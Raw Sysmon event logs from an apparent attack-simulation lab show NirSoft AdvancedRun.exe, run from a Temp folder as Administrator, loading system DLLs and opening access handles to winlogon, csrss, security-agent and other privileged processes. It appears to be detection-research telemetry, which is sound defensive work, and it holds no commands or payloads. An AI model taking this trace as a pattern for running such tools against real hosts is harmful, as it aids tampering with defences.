20:09:25.950{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004068027Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.949{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068026Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.948{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068025Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.948{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068024Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:09:25.947{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068023Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.947{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068022Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.946{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068021Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.946{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you 
choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004068020Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.939{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004068019Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:25.937{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\Na
20:08:57.657{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067463Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.657{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067462Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.657{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067461Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.657{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067460Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.656{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067459Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.656{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004067458Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.656{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067457Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.656{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067456Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.656{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067455Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.656{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067454Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.656{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067453Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.655{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067452Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.655{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067451Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 